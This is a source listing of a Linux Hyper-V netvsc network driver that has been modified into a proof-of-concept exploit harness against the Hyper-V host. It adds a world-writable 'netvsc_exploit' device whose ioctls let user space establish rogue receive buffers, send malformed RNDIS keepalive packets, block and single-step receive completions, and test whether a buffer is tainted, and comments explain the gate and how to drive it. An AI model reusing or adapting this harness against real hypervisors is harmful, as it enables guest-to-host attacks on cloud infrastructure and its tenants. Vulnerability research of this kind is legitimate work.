866 | */ 867 | if (!skb) { 868 | cur_send = packet; 869 | goto send_now; 870 | } 871 | 872 | /* batch packets in send buffer if possible */ 873 | msdp = &nvchan->msd; 874 | if (msdp->pkt) 875 | msd_len = msdp->pkt->total_data_buflen; 876 | 877 | try_batch = msd_len > 0 && msdp->count < net_device->max_pkt; 878 | if (try_batch && msd_len + pktlen + net_device->pkt_align < 879 | net_device->send_section_size) { 880 | section_index = msdp->pkt->send_buf_index; 881 | 882 | } else if (try_batch && msd_len + packet->rmsg_size < 883 | net_device->send_section_size) { 884 | section_index = msdp->pkt->send_buf_index; 885 | packet->cp_partial = true; 886 | 887 | } else if (pktlen + net_device->pkt_align < 888 | net_device->send_section_size) { 889 | section_index = netvsc_get_next_send_section(net_device); 890 | if (unlikely(section_index == NETVSC_INVALID_INDEX)) { 891 | ++ndev_ctx->eth_stats.tx_send_full; 892 | } else { 893 | move_pkt_msd(&msd_send, &msd_skb, msdp); 894 | msd_len = 0; 895 | } 896 | } 897 | 898 | if (section_index != NETVSC_INVALID_INDEX) { 899 | netvsc_copy_to_send_buf(net_device, 900 | section_index, msd_len, 901 | packet, rndis_msg, pb, skb); 902 | 903 | packet->send_buf_index = section_index; 904 | 905 | if (packet->cp_partial) { 906 | packet->page_buf_cnt -= packet->rmsg_pgcnt; 907 | packet->total_data_buflen = msd_len + packet->rmsg_size; 908 | } else { 909 | packet->page_buf_cnt = 0; 910 | packet->total_data_buflen += msd_len; 911 | } 912 | 913 | if (msdp->pkt) { 914 | packet->total_packets += msdp->pkt->total_packets; 915 | packet->total_bytes += msdp->pkt->total_bytes; 916 | } 917 | 918 | if (msdp->skb) 919 | dev_consume_skb_any(msdp->skb); 920 | 921 | if (xmit_more && !packet->cp_partial) { 922 | msdp->skb = skb; 923 | msdp->pkt = packet; 924 | msdp->count++; 925 | } else { 926 | cur_send = packet; 927 | msdp->skb = NULL; 928 | msdp->pkt = NULL; 929 | msdp->count = 0; 930 | } 931 | } else { 932 | move_pkt_msd(&msd_send, &msd_skb, msdp); 933 | cur_send = packet; 934 | } 935 | 936 | if (msd_send) { 937 | int m_ret = netvsc_send_pkt(device, msd_send, net_device, 938 | NULL, msd_skb); 939 | 940 | if (m_ret != 0) { 941 | netvsc_free_send_slot(net_device, 942 | msd_send->send_buf_index); 943 | dev_kfree_skb_any(msd_skb); 944 | } 945 | } 946 | 947 | send_now: 948 | if (cur_send) 949 | ret = netvsc_send_pkt(device, cur_send, net_device, pb, skb); 950 | 951 | if (ret != 0 && section_index != NETVSC_INVALID_INDEX) 952 | netvsc_free_send_slot(net_device, section_index); 953 | 954 | return ret; 955 | } 956 | 957 | /* Send pending recv completions */ 958 | int send_recv_completions(struct net_device *ndev, 959 | struct netvsc_device *nvdev, 960 | struct netvsc_channel *nvchan) 961 | { 962 | struct multi_recv_comp *mrc = &nvchan->mrc; 963 | struct recv_comp_msg { 964 | struct nvsp_message_header hdr; 965 | u32 status; 966 | } __packed; 967 | struct recv_comp_msg msg = { 968 | .hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 969 | }; 970 | int ret; 971 | 972 | if (g_block_rndis_thread) 973 | { 974 | return 0; 975 | } 976 |
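/* Note on the PoC gate above: returning 0 while completions are still queued makes netvsc_poll() treat the completion ring as flushed, so NAPI completes normally while the rcd slots stay pending in mrc. Ring3 toggles the gate via HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD and can then replay queued completions one at a time with HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE (see netvsc_drv.c). */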
977 | while (mrc->first != mrc->next) { 978 | const struct recv_comp_data *rcd 979 | = mrc->slots + mrc->first; 980 | 981 | 982 | printk("[*]hv_netvsc send NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE(channel:%p).\n", nvchan->channel); 983 | msg.status = rcd->status; 984 | ret = vmbus_sendpacket(nvchan->channel, &msg, sizeof(msg), 985 | rcd->tid, VM_PKT_COMP, 0); 986 | if (unlikely(ret)) { 987 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 988 | 989 | ++ndev_ctx->eth_stats.rx_comp_busy; 990 | return ret; 991 | } 992 | 993 | if (++mrc->first == nvdev->recv_completion_cnt) 994 | mrc->first = 0; 995 | } 996 | 997 | /* receive completion ring has been emptied */ 998 | if (unlikely(nvdev->destroy)) 999 | wake_up(&nvdev->wait_drain); 1000 | 1001 | return 0; 1002 | } 1003 | 1004 | /* Count how many receive completion slots are filled and how many remain available */ 1005 | static void recv_comp_slot_avail(const struct netvsc_device *nvdev, 1006 | const struct multi_recv_comp *mrc, 1007 | u32 *filled, u32 *avail) 1008 | { 1009 | u32 count = nvdev->recv_completion_cnt; 1010 | 1011 | if (mrc->next >= mrc->first) 1012 | *filled = mrc->next - mrc->first; 1013 | else 1014 | *filled = (count - mrc->first) + mrc->next; 1015 | 1016 | *avail = count - *filled - 1; 1017 | } 1018 | 1019 | /* Add receive complete to ring to send to host. */ 1020 | static void enq_receive_complete(struct net_device *ndev, 1021 | struct netvsc_device *nvdev, u16 q_idx, 1022 | u64 tid, u32 status) 1023 | { 1024 | struct netvsc_channel *nvchan = &nvdev->chan_table[q_idx]; 1025 | struct multi_recv_comp *mrc = &nvchan->mrc; 1026 | struct recv_comp_data *rcd; 1027 | u32 filled, avail; 1028 | 1029 | recv_comp_slot_avail(nvdev, mrc, &filled, &avail); 1030 | 1031 | if (unlikely(filled > NAPI_POLL_WEIGHT)) { 1032 | send_recv_completions(ndev, nvdev, nvchan); 1033 | recv_comp_slot_avail(nvdev, mrc, &filled, &avail); 1034 | } 1035 | 1036 | if (unlikely(!avail)) { 1037 | netdev_err(ndev, "Recv_comp full buf q:%hd, tid:%llx\n", 1038 | q_idx, tid); 1039 | return; 1040 | } 1041 | 1042 | rcd = mrc->slots + mrc->next; 1043 | rcd->tid = tid; 1044 | rcd->status = status; 1045 | 1046 | if (++mrc->next == nvdev->recv_completion_cnt) 1047 | mrc->next = 0; 1048 | } 1049 | 1050 | static int netvsc_receive(struct net_device *ndev, 1051 | struct netvsc_device *net_device, 1052 | struct net_device_context *net_device_ctx, 1053 | struct hv_device *device, 1054 | struct vmbus_channel *channel, 1055 | const struct vmpacket_descriptor *desc, 1056 | struct nvsp_message *nvsp) 1057 | { 1058 | const struct vmtransfer_page_packet_header *vmxferpage_packet 1059 | = container_of(desc, const struct vmtransfer_page_packet_header, d); 1060 | u16 q_idx = channel->offermsg.offer.sub_channel_index; 1061 | char *recv_buf = net_device->recv_buf; 1062 | u32 status = NVSP_STAT_SUCCESS; 1063 | int i; 1064 | int count = 0; 1065 | 1066 | /* Make sure this is a valid nvsp packet */ 1067 | if (unlikely(nvsp->hdr.msg_type != NVSP_MSG1_TYPE_SEND_RNDIS_PKT)) { 1068 | netif_err(net_device_ctx, rx_err, ndev, 1069 | "Unknown nvsp packet type received %u\n", 1070 | nvsp->hdr.msg_type); 1071 | return 0; 1072 | } 1073 | 1074 | if (unlikely(vmxferpage_packet->xfer_pageset_id != NETVSC_RECEIVE_BUFFER_ID)) { 1075 | netif_err(net_device_ctx, rx_err, ndev, 1076 | "Invalid xfer page set id - expecting %x got %x\n", 1077 | NETVSC_RECEIVE_BUFFER_ID, 1078 | vmxferpage_packet->xfer_pageset_id); 1079 | return 0; 1080 | } 1081 | 1082 | count = vmxferpage_packet->range_cnt; 1083 | 1084 | /* Each range represents 1 RNDIS pkt that contains 1 ethernet frame */ 1085 | for (i = 0; i < count; i++) { 1086 | void *data = recv_buf 1087 | + vmxferpage_packet->ranges[i].byte_offset; 1088 | u32 buflen = vmxferpage_packet->ranges[i].byte_count; 1089 | 1090 | /* Pass it to the upper layer */ 1091 | status = rndis_filter_receive(ndev, net_device, device, 1092 | channel, data, buflen); 1093 | } 1094 | 1095 | enq_receive_complete(ndev, net_device, q_idx, 1096 |
vmxferpage_packet->d.trans_id, status); 1097 | 1098 | return count; 1099 | } 1100 | 1101 | static void netvsc_send_table(struct hv_device *hdev, 1102 | struct nvsp_message *nvmsg) 1103 | { 1104 | struct net_device *ndev = hv_get_drvdata(hdev); 1105 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1106 | int i; 1107 | u32 count, *tab; 1108 | 1109 | count = nvmsg->msg.v5_msg.send_table.count; 1110 | if (count != VRSS_SEND_TAB_SIZE) { 1111 | netdev_err(ndev, "Received wrong send-table size:%u\n", count); 1112 | return; 1113 | } 1114 | 1115 | tab = (u32 *)((unsigned long)&nvmsg->msg.v5_msg.send_table + 1116 | nvmsg->msg.v5_msg.send_table.offset); 1117 | 1118 | for (i = 0; i < count; i++) 1119 | net_device_ctx->tx_send_table[i] = tab[i]; 1120 | } 1121 | 1122 | static void netvsc_send_vf(struct net_device_context *net_device_ctx, 1123 | struct nvsp_message *nvmsg) 1124 | { 1125 | net_device_ctx->vf_alloc = nvmsg->msg.v4_msg.vf_assoc.allocated; 1126 | net_device_ctx->vf_serial = nvmsg->msg.v4_msg.vf_assoc.serial; 1127 | } 1128 | 1129 | static inline void netvsc_receive_inband(struct hv_device *hdev, 1130 | struct net_device_context *net_device_ctx, 1131 | struct nvsp_message *nvmsg) 1132 | { 1133 | switch (nvmsg->hdr.msg_type) { 1134 | case NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE: 1135 | netvsc_send_table(hdev, nvmsg); 1136 | break; 1137 | 1138 | case NVSP_MSG4_TYPE_SEND_VF_ASSOCIATION: 1139 | netvsc_send_vf(net_device_ctx, nvmsg); 1140 | break; 1141 | } 1142 | } 1143 | 1144 | static int netvsc_process_raw_pkt(struct hv_device *device, 1145 | struct vmbus_channel *channel, 1146 | struct netvsc_device *net_device, 1147 | struct net_device *ndev, 1148 | const struct vmpacket_descriptor *desc, 1149 | int budget) 1150 | { 1151 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1152 | struct nvsp_message *nvmsg = hv_pkt_data(desc); 1153 | 1154 | switch (desc->type) { 1155 | case VM_PKT_COMP: 1156 | netvsc_send_completion(net_device, channel, device, 1157 | desc, budget); 1158 | break; 1159 | 1160 | case VM_PKT_DATA_USING_XFER_PAGES: 1161 | return netvsc_receive(ndev, net_device, net_device_ctx, 1162 | device, channel, desc, nvmsg); 1163 | break; 1164 | 1165 | case VM_PKT_DATA_INBAND: 1166 | netvsc_receive_inband(device, net_device_ctx, nvmsg); 1167 | break; 1168 | 1169 | default: 1170 | netdev_err(ndev, "unhandled packet type %d, tid %llx\n", 1171 | desc->type, desc->trans_id); 1172 | break; 1173 | } 1174 | 1175 | return 0; 1176 | } 1177 | 1178 | 1179 | static struct hv_device *netvsc_channel_to_device(struct vmbus_channel *channel) 1180 | { 1181 | struct vmbus_channel *primary = channel->primary_channel; 1182 | 1183 | return primary ? primary->device_obj : channel->device_obj; 1184 | } 1185 | 1186 | /* Network processing softirq 1187 | * Process data in incoming ring buffer from host 1188 | * Stops when ring is empty or budget is met or exceeded. 
1189 | */ 1190 | int netvsc_poll(struct napi_struct *napi, int budget) 1191 | { 1192 | struct netvsc_channel *nvchan 1193 | = container_of(napi, struct netvsc_channel, napi); 1194 | struct netvsc_device *net_device = nvchan->net_device; 1195 | struct vmbus_channel *channel = nvchan->channel; 1196 | struct hv_device *device = netvsc_channel_to_device(channel); 1197 | struct net_device *ndev = hv_get_drvdata(device); 1198 | int work_done = 0; 1199 | 1200 | /* If starting a new interval */ 1201 | if (!nvchan->desc) 1202 | nvchan->desc = hv_pkt_iter_first(channel); 1203 | 1204 | while (nvchan->desc && work_done < budget) { 1205 | work_done += netvsc_process_raw_pkt(device, channel, net_device, 1206 | ndev, nvchan->desc, budget); 1207 | nvchan->desc = hv_pkt_iter_next(channel, nvchan->desc); 1208 | } 1209 | 1210 | /* If send of pending receive completions succeeded 1211 | * and did not exhaust NAPI budget this time 1212 | * and not doing busy poll 1213 | * then re-enable host interrupts 1214 | * and reschedule if ring is not empty. 1215 | */ 1216 | if (send_recv_completions(ndev, net_device, nvchan) == 0 && 1217 | work_done < budget && 1218 | napi_complete_done(napi, work_done) && 1219 | hv_end_read(&channel->inbound)) { 1220 | hv_begin_read(&channel->inbound); 1221 | napi_reschedule(napi); 1222 | } 1223 | 1224 | /* Driver may overshoot since multiple packets per descriptor */ 1225 | return min(work_done, budget); 1226 | } 1227 | 1228 | /* Call back when data is available in host ring buffer. 1229 | * Processing is deferred until network softirq (NAPI) 1230 | */ 1231 | void netvsc_channel_cb(void *context) 1232 | { 1233 | struct netvsc_channel *nvchan = context; 1234 | struct vmbus_channel *channel = nvchan->channel; 1235 | struct hv_ring_buffer_info *rbi = &channel->inbound; 1236 | 1237 | /* preload first vmpacket descriptor */ 1238 | prefetch(hv_get_ring_buffer(rbi) + rbi->priv_read_index); 1239 | 1240 | if (napi_schedule_prep(&nvchan->napi)) { 1241 | /* disable interrupts from host */ 1242 | hv_begin_read(rbi); 1243 | 1244 | __napi_schedule(&nvchan->napi); 1245 | } 1246 | } 1247 | 1248 | /* 1249 | * netvsc_device_add - Callback when the device belonging to this 1250 | * driver is added 1251 | */ 1252 | struct netvsc_device *netvsc_device_add(struct hv_device *device, 1253 | const struct netvsc_device_info *device_info) 1254 | { 1255 | int i, ret = 0; 1256 | int ring_size = device_info->ring_size; 1257 | struct netvsc_device *net_device; 1258 | struct net_device *ndev = hv_get_drvdata(device); 1259 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1260 | 1261 | net_device = alloc_net_device(); 1262 | if (!net_device) 1263 | return ERR_PTR(-ENOMEM); 1264 | 1265 | net_device->ring_size = ring_size; 1266 | 1267 | /* Because the device uses NAPI, all the interrupt batching and 1268 | * control is done via Net softirq, not the channel handling 1269 | */ 1270 | set_channel_read_mode(device->channel, HV_CALL_ISR); 1271 | 1272 | /* If we're reopening the device we may have multiple queues, fill the 1273 | * chn_table with the default channel to use it before subchannels are 1274 | * opened. 1275 | * Initialize the channel state before we open; 1276 | * we can be interrupted as soon as we open the channel. 1277 | */
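/* For scale: with the default ring_size of 128 pages (module parameter in netvsc_drv.c) and 4 KiB pages, the vmbus_open() call below requests 128 * 4096 = 524288 bytes, i.e. a 512 KiB ring buffer in each direction. */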
1278 | 1279 | for (i = 0; i < VRSS_CHANNEL_MAX; i++) { 1280 | struct netvsc_channel *nvchan = &net_device->chan_table[i]; 1281 | 1282 | nvchan->channel = device->channel; 1283 | nvchan->net_device = net_device; 1284 | u64_stats_init(&nvchan->tx_stats.syncp); 1285 | u64_stats_init(&nvchan->rx_stats.syncp); 1286 | } 1287 | 1288 | /* Enable NAPI handler before init callbacks */ 1289 | netif_napi_add(ndev, &net_device->chan_table[0].napi, 1290 | netvsc_poll, NAPI_POLL_WEIGHT); 1291 | 1292 | /* Open the channel */ 1293 | printk("[*]hv_netvsc: netvsc_device_add channel:%p\n", device->channel); 1294 | ret = vmbus_open(device->channel, ring_size * PAGE_SIZE, 1295 | ring_size * PAGE_SIZE, NULL, 0, 1296 | netvsc_channel_cb, 1297 | net_device->chan_table); 1298 | 1299 | if (ret != 0) { 1300 | netif_napi_del(&net_device->chan_table[0].napi); 1301 | netdev_err(ndev, "unable to open channel: %d\n", ret); 1302 | goto cleanup; 1303 | } 1304 | 1305 | /* Channel is opened */ 1306 | netdev_dbg(ndev, "hv_netvsc channel opened successfully\n"); 1307 | 1308 | napi_enable(&net_device->chan_table[0].napi); 1309 | 1310 | /* Writing nvdev pointer unlocks netvsc_send(), make sure chn_table is 1311 | * populated. 1312 | */ 1313 | rcu_assign_pointer(net_device_ctx->nvdev, net_device); 1314 | 1315 | /* Connect with the NetVsp */ 1316 | ret = netvsc_connect_vsp(device, net_device, device_info); 1317 | if (ret != 0) { 1318 | netdev_err(ndev, 1319 | "unable to connect to NetVSP - %d\n", ret); 1320 | goto close; 1321 | } 1322 | 1323 | return net_device; 1324 | 1325 | close: 1326 | RCU_INIT_POINTER(net_device_ctx->nvdev, NULL); 1327 | napi_disable(&net_device->chan_table[0].napi); 1328 | 1329 | /* Now, we can close the channel safely */ 1330 | vmbus_close(device->channel); 1331 | 1332 | cleanup: 1333 | free_netvsc_device(&net_device->rcu); 1334 | 1335 | return ERR_PTR(ret); 1336 | } 1337 |
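/* End of netvsc.c. The PoC-specific changes in this file are the [*]hv_netvsc printk() traces, which fire in the order the VSP handshake runs (NVSP_MSG_TYPE_INIT -> NVSP_MSG2_TYPE_SEND_NDIS_CONFIG -> NVSP_MSG1_TYPE_SEND_NDIS_VER -> NVSP_MSG1_TYPE_SEND_RECV_BUF -> NVSP_MSG1_TYPE_SEND_SEND_BUF, then NVSP_MSG1_TYPE_SEND_RNDIS_PKT for traffic), and the g_block_rndis_thread gate in send_recv_completions(). */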
-------------------------------------------------------------------------------- /ring0/hyperv/netvsc_drv.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Microsoft Corporation. 3 | * 4 | * This program is free software; you can redistribute it and/or modify it 5 | * under the terms and conditions of the GNU General Public License, 6 | * version 2, as published by the Free Software Foundation. 7 | * 8 | * This program is distributed in the hope it will be useful, but WITHOUT 9 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 10 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 11 | * more details. 12 | * 13 | * You should have received a copy of the GNU General Public License along with 14 | * this program; if not, see <http://www.gnu.org/licenses/>. 15 | * 16 | * Authors: 17 | * Haiyang Zhang <haiyangz@microsoft.com> 18 | * Hank Janssen <hjanssen@microsoft.com> 19 | */ 20 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt 21 | 22 | #include <linux/init.h> 23 | #include <linux/atomic.h> 24 | #include <linux/module.h> 25 | #include <linux/highmem.h> 26 | #include <linux/device.h> 27 | #include <linux/io.h> 28 | #include <linux/delay.h> 29 | #include <linux/netdevice.h> 30 | #include <linux/inetdevice.h> 31 | #include <linux/etherdevice.h> 32 | #include <linux/skbuff.h> 33 | #include <linux/if_vlan.h> 34 | #include <linux/in.h> 35 | #include <linux/slab.h> 36 | #include <linux/rtnetlink.h> 37 | #include <linux/netpoll.h> 38 | 39 | //add by 4B5F5F4B 40 | #include <linux/miscdevice.h> 41 | #include <linux/fs.h> 42 | #include <linux/uaccess.h> 43 | 44 | 45 | #include <net/arp.h> 46 | #include <net/route.h> 47 | #include <net/sock.h> 48 | #include <net/pkt_sched.h> 49 | #include <net/checksum.h> 50 | #include <net/ip6_checksum.h> 51 | 52 | #include "hyperv_net.h" 53 | 54 | //add by 4B5F5F4B 55 | #include "hyper_v.h" 56 | 57 | #define RING_SIZE_MIN 64 58 | #define NETVSC_MIN_TX_SECTIONS 10 59 | #define NETVSC_DEFAULT_TX 192 /* ~1M */ 60 | #define NETVSC_MIN_RX_SECTIONS 10 /* ~64K */ 61 | #define NETVSC_DEFAULT_RX 10485 /* Max ~16M */ 62 | 63 | #define LINKCHANGE_INT (2 * HZ) 64 | #define VF_TAKEOVER_INT (HZ / 10) 65 | 66 | static int ring_size = 128; 67 | module_param(ring_size, int, S_IRUGO); 68 | MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)"); 69 | 70 | static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE | 71 | NETIF_MSG_LINK | NETIF_MSG_IFUP | 72 | NETIF_MSG_IFDOWN | NETIF_MSG_RX_ERR | 73 | NETIF_MSG_TX_ERR; 74 | 75 | static int debug = -1; 76 | module_param(debug, int, S_IRUGO); 77 | MODULE_PARM_DESC(debug, "Debug level (0=none,...,16=all)"); 78 | 79 | //add by 4B5F5F4B 80 | static struct hv_device* g_device = NULL; 81 | static struct net_device* g_net_device = NULL; 82 | static struct netvsc_device* g_netvsc_device = NULL; 83 | static struct netvsc_device_info* g_device_info = NULL; 84 | static struct rndis_device* g_rndis_device = NULL; 85 | bool g_block_rndis_thread = false; 86 | 87 | 88 | extern int send_recv_completions(struct net_device *ndev, 89 | struct netvsc_device *nvdev, 90 | struct netvsc_channel *nvchan); 91 | long netvsc_ioctl(struct file *filp, unsigned int cmd, unsigned long arg); 92 | struct file_operations netvsc_exploit_fops = { 93 | .unlocked_ioctl = netvsc_ioctl 94 | }; 95 | 96 | static struct miscdevice netvsc_exploit_device = { 97 | .minor = MISC_DYNAMIC_MINOR, 98 | .name = "netvsc_exploit", 99 | .fops = &netvsc_exploit_fops, 100 | .mode = 0777 101 | }; 102 | 103 | long netvsc_ioctl(struct file *filp, 104 | unsigned int cmd, 105 | unsigned long arg){ 106 | 107 | int ret = 0; 108 | 109 | switch(cmd) 110 | { 111 | 112 | case HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL: 113 | { 114 | 115 | RECEIVE_BUFFER_INFO recv_buf_info; 116 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(recv_buf_info)) != 0) 117 | { 118 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 119 | return -1; 120 | } 121 | 122 | 123 | recv_buf_info.receive_buffer = vzalloc(recv_buf_info.receive_buffer_size); 124 | if(!recv_buf_info.receive_buffer) 125 | { 126 | printk("[*]netvsc_ioctl: vzalloc fail.\n"); 127 | return -1; 128 | } 129 | ret = vmbus_establish_gpadl(g_device->channel, recv_buf_info.receive_buffer, recv_buf_info.receive_buffer_size, &recv_buf_info.receive_buffer_gpadl_handle); 130 | if(0 != ret) 131 | { 132 | printk("[*]netvsc_ioctl: vmbus_establish_gpadl fail.\n"); 133 | return -1; 134 | } 135 | 136 | if(copy_to_user((void __user*)arg, &recv_buf_info, sizeof(recv_buf_info)) != 0) 137 | { 138 | printk("[*]netvsc_ioctl: copy_to_user fail.\n"); 139 | return -1; 140 | } 141 | break; 142 | } 143 |
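/* Ring3 usage sketch for the pair of ioctls around this point (hypothetical snippet; the struct layout comes from hyper_v.h, and the misc device registered above typically appears as /dev/netvsc_exploit): RECEIVE_BUFFER_INFO info = { 0 }; info.receive_buffer_size = 16 * 4096; int fd = open("/dev/netvsc_exploit", O_RDWR); ioctl(fd, HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL, &info); then ioctl(fd, HYPERV_IOCTL_INIT_RECV_BUF_SEND_BUFFER, &info.receive_buffer_gpadl_handle); after which the host treats the freshly established GPADL as its receive buffer. */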
144 | case HYPERV_IOCTL_INIT_RECV_BUF_SEND_BUFFER: 145 | { 146 | struct nvsp_message init_packet; 147 | u32 gpadl_handle; 148 | 149 | memset(&init_packet, 0, sizeof(struct nvsp_message)); 150 | if(copy_from_user(&gpadl_handle, (void __user*)arg, sizeof(gpadl_handle)) != 0) 151 | { 152 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 153 | return -1; 154 | } 155 | 156 | init_packet.hdr.msg_type = NVSP_MSG1_TYPE_SEND_RECV_BUF; 157 | init_packet.msg.v1_msg.send_recv_buf.gpadl_handle = gpadl_handle; 158 | init_packet.msg.v1_msg.send_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 159 | 160 | ret = vmbus_sendpacket(g_device->channel, &init_packet, 161 | sizeof(struct nvsp_message), 162 | (unsigned long)&init_packet, 163 | VM_PKT_DATA_INBAND, 164 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 165 | 166 | if(ret != 0) 167 | { 168 | printk("[*]netvsc_ioctl: vmbus_sendpacket send NVSP_MSG1_TYPE_SEND_RECV_BUF fail.\n"); 169 | return -1; 170 | } 171 | 172 | 173 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_RECEIVE_BUFFER success.\n"); 174 | break; 175 | } 176 | 177 | 178 | case HYPERV_IOCTL_DESTROY_RECV_BUF: 179 | { 180 | RECEIVE_BUFFER_INFO recv_buf_info; 181 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(recv_buf_info)) != 0) 182 | { 183 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 184 | return -1; 185 | } 186 | 187 | vfree(recv_buf_info.receive_buffer); 188 | break; 189 | } 190 | 191 | 192 | 193 | case HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE: 194 | { 195 | 196 | bool is_malformed; 197 | struct rndis_request * request; 198 | 199 | if(copy_from_user(&is_malformed, (void __user*)arg, sizeof(is_malformed)) != 0) 200 | { 201 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 202 | return -1; 203 | } 204 | /* 205 | create a malformed struct rndis_keepalive_request 206 | */ 207 | request = get_rndis_request(g_rndis_device, RNDIS_MSG_KEEPALIVE, RNDIS_MESSAGE_SIZE(struct rndis_keepalive_request)); 208 | if(NULL == request) 209 | { 210 | printk("[*]netvsc_ioctl: get_rndis_request fail.\n"); 211 | return -1; 212 | } 213 | 214 | if(is_malformed) 215 | request->request_msg.msg_len = 0x4B; 216 | 217 | ret = rndis_filter_send_request(g_rndis_device, request); 218 | if(0 != ret) 219 | { 220 | printk("[*]netvsc_ioctl: rndis_filter_send_request fail.\n"); 221 | return -1; 222 | } 223 | 224 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_KEEPALIVE success.\n"); 225 | break; 226 | } 227 | 228 | case HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY: 229 | { 230 | struct rndis_query_request *query; 231 | struct rndis_request *request = get_rndis_request(g_rndis_device, RNDIS_MSG_QUERY, RNDIS_MESSAGE_SIZE(struct rndis_query_request)); 232 | if(NULL == request) return -1; 233 | query = &request->request_msg.msg.query_req; 234 | query->oid = RNDIS_OID_802_3_PERMANENT_ADDRESS; 235 | query->info_buf_offset = sizeof(struct rndis_query_request); 236 | query->info_buflen = 0; 237 | query->dev_vc_handle = 0; 238 | 239 | ret = rndis_filter_send_request(g_rndis_device, request); 240 | if(0 != ret) 241 | { 242 | printk("[*]netvsc_ioctl: rndis_filter_send_request fail.\n"); 243 | } 244 | else 245 | { 246 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_QUERY success.\n"); 247 | } 248 | break; 249 | } 250 | 251 | case HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE: 252 | { 253 | 254 | struct netvsc_channel* nvchan = &g_netvsc_device->chan_table[0]; 255 | struct multi_recv_comp *mrc = &nvchan->mrc; 256 | struct recv_comp_msg { 257 | struct nvsp_message_header hdr; 258 | u32 status; 259 | } __packed; 260 | struct recv_comp_msg msg = { 261 | .hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 262 | }; 263 | 264 | const struct recv_comp_data *rcd = mrc->slots + mrc->first; 265 | msg.status = rcd->status; 266 | ret = vmbus_sendpacket(nvchan->channel, &msg, sizeof(msg), rcd->tid, VM_PKT_COMP, 0); 267 | ++mrc->first; 268 | break; 269 | } 270 |
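/* The case above replays by hand exactly one iteration of the loop in send_recv_completions(): it returns the oldest queued receive completion (mrc->first) to the host as VM_PKT_COMP and advances the ring. Together with HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD below, this gives ring3 single-step control over when the host sees completions. */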
271 | case HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD: 272 | { 273 | if(copy_from_user(&g_block_rndis_thread, (void __user*)arg, sizeof(g_block_rndis_thread)) != 0) 274 | { 275 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 276 | return -1; 277 | } 278 | 279 | if(false == g_block_rndis_thread) 280 | { 281 | int i; 282 | for(i = 0; i < g_netvsc_device->num_chn; i++) 283 | { 284 | struct netvsc_channel* nvchan = &g_netvsc_device->chan_table[i]; 285 | if(nvchan->channel->primary_channel == NULL) 286 | send_recv_completions(g_net_device, g_netvsc_device, nvchan); 287 | 288 | } 289 | 290 | } 291 | 292 | printk("[*]netvsc_ioctl: g_block_rndis_thread:%d\n", g_block_rndis_thread); 293 | break; 294 | } 295 | 296 | 297 | case HYPERV_IOCTL_CHECK_RECEIVE_BUFFER_TAINTED: 298 | { 299 | RECEIVE_BUFFER_INFO recv_buf_info; 300 | bool tainted = false; 301 | int i, j; 302 | u32 recv_buf_page_count; 303 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(RECEIVE_BUFFER_INFO)) != 0) 304 | { 305 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 306 | return -1; 307 | } 308 | 309 | recv_buf_page_count = recv_buf_info.receive_buffer_size / PAGE_SIZE; 310 | for(i = recv_buf_page_count - 1; i > 0; i--) 311 | { 312 | void* base_addr = (char *)recv_buf_info.receive_buffer + i * PAGE_SIZE; 313 | for(j = 0; j < PAGE_SIZE; j++) 314 | { 315 | if(*((unsigned char*)base_addr + j) != 0) 316 | { 317 | tainted = true; 318 | break; 319 | } 320 | } 321 | if(tainted) 322 | break; 323 | } 324 | 325 | recv_buf_info.receive_buffer_tainted = tainted; 326 | if(copy_to_user((void __user*)arg, &recv_buf_info, sizeof(recv_buf_info)) != 0) 327 | { 328 | printk("[*]netvsc_ioctl: copy_to_user fail.\n"); 329 | return -1; 330 | } 331 | break; 332 | } 333 | } 334 | 335 | return ret; 336 | } 337 | 347 | static void netvsc_set_multicast_list(struct net_device *net) 348 | { 349 | struct net_device_context *net_device_ctx = netdev_priv(net); 350 | 351 | struct netvsc_device *nvdev = 352 | rtnl_dereference(net_device_ctx->nvdev); 353 | 354 | rndis_filter_update(nvdev); 355 | } 356 | 357 | static int netvsc_open(struct net_device *net) 358 | { 359 | struct net_device_context *ndev_ctx = netdev_priv(net); 360 | struct net_device *vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 361 | struct netvsc_device *nvdev = rtnl_dereference(ndev_ctx->nvdev); 362 | struct rndis_device *rdev; 363 | int ret = 0; 364 | 365 | g_net_device = net; 366 | netif_carrier_off(net); 367 | 368 | /* Open up the device */ 369 | ret = rndis_filter_open(nvdev); 370 | if (ret != 0) { 371 | netdev_err(net, "unable to open device (ret %d).\n", ret); 372 | return ret; 373 | } 374 